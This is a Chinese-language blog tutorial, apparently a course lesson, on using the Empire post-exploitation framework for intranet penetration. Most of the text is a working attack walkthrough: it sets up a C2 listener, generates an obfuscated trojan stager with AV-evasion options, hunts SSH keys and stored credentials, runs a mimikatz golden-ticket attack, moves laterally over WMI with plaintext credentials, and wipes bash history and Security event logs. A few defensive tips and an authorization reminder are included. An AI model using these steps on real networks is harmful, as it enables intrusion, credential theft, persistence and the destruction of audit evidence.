第12章 第112课
Empire框架与内网渗透实战:从入门到精准控制
大家好,今天我们来聊聊内网渗透中那个让人又爱又怕的"大杀器"——Empire框架。作为一个红队选手,Empire就像你的瑞士军刀,但用得不好也会伤到自己 ( ̄ω ̄;)
1. Empire框架初体验:比Metasploit更"社工"的工具
(1) 为什么选择Empire?
- 隐蔽性强:基于PowerShell,无文件落地
- 模块丰富:从信息搜集到横向移动全覆盖
- 适合内网:原生支持Windows域环境
对比Metasploit:
Metasploit:像AK47,威力大但动静也大
Empire:像消音手枪,适合隐蔽行动
(2) 快速搭建环境
# Kali安装(实测2023年仍可用)
git clone https://github.com/EmpireProject/Empire
cd Empire/setup
./install.sh
# 首次运行记得重置数据库
./reset.sh
常见报错解决:
# 遇到"ImportError: No module named..."
pip install -r requirements.txt
2. 基础使用:从监听器到木马生成
(1) 创建HTTP监听器
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host 192.168.1.100
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute
[*] Listener successfully started!
实战技巧:
- 用
set DefaultProfile /admin/login.php伪装成管理页面 - 在云服务器上搭配CDN隐藏真实IP
(2) 生成木马
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > generate
[+] Bat stager written to /tmp/launcher.bat
免杀技巧:
# 使用混淆编码
set Obfuscate True
set ObfuscateCommand Token\All\1
3. 内网信息搜集实战
(1) 自动化搜集(Empire模块)
(Empire: agents) > interact 2XQ9
(Empire: 2XQ9) > usemodule situational_awareness/host/winenum
(Empire: module/situational_awareness/host/winenum) > execute
[*] Running host recon...
[+] Saved output to /logs/2XQ9_winenum.txt
获取的关键信息:
- 域管理员最近登录时间
- 共享文件夹列表
- 未加密的凭据
(2) 手动补充搜集(Linux版)
# 查看sudo权限
sudo -l
# 检查SSH私钥
find / -name id_rsa 2>/dev/null
# 分析网络配置
cat /etc/network/interfaces
arp -a
隐藏技巧:
# 清空命令历史
echo "" > ~/.bash_history
4. 域环境探测进阶技巧
(1) 快速判断是否存在域
# Windows命令
nltest /domain_trusts
# Empire专用模块
usemodule situational_awareness/network/powerview/get_domain
输出解读:
Domain: CORP.COM
Sid: S-1-5-21-123456789-987654321-...
Trusted domains: DEV.CORP.COM# 发现子域!
(2) 定位域控制器
nslookup -type=srv _ldap._tcp.dc._msdcs.CORP.COM
实战场景:
如果返回多个IP,优先攻击版本较旧的DC(如Windows Server 2012)
5. 后渗透阶段:持久化与横向移动
(1) 黄金票据攻击
usemodule credentials/mimikatz/golden_ticket
set Domain CORP.COM
set krbtgt_hash a9f2f87bc3...
execute
防御检测:
- 监控Kerberos TGT请求频率
- 启用Windows Defender ATP
(2) 隐蔽横向移动
usemodule lateral_movement/invoke_wmi
set ComputerName DC01
set UserName CORP\Admin
set Password P@ssw0rd123
execute
替代方案:
- 使用SMBExec绕过杀软
- 通过计划任务定时执行
6. 清理痕迹与防御建议
(1) 日志清理
# 清除单个事件日志
Clear-EventLog -LogName Security
# Empire专用模块
usemodule management/eventvwr/clear
注意:
- 企业环境可能有日志外发,本地删除无效
- 优先禁用日志服务而非删除
(2) 防御措施
# 企业防御建议
1. 限制PowerShell执行策略
2. 监控异常网络连接(如到8080端口的POST请求)
3. 定期检查域控的SPN异常
7. 总结:Empire实战流程图
graph TD
A[设置监听器] --> B[生成免杀木马]
B --> C[初始立足点]
C --> D{是否在域环境?}
D -->|是| E[域信息搜集]
D -->|否| F[本地提权]
E --> G[横向移动]
G --> H[拿下域控]
最后忠告:
- 在授权范围内测试
- 别用默认配置(会被秒封)
- 保持学习,工具永远在进化
下次我们聊聊Cobalt Strike与Empire的配合使用,想看的同学评论区扣1(真的会有人扣吗?)( ͡° ͜ʖ ͡°)
感谢浏览和学习,作者:鱼油YOU,转载请注明原文链接:https://www.cnblogs.com/OmegaYOU3/p/19028182,或者可以➕主播WX:OmegaAnimeman_desu;QQ:3819054512
浙公网安备 33010602011771号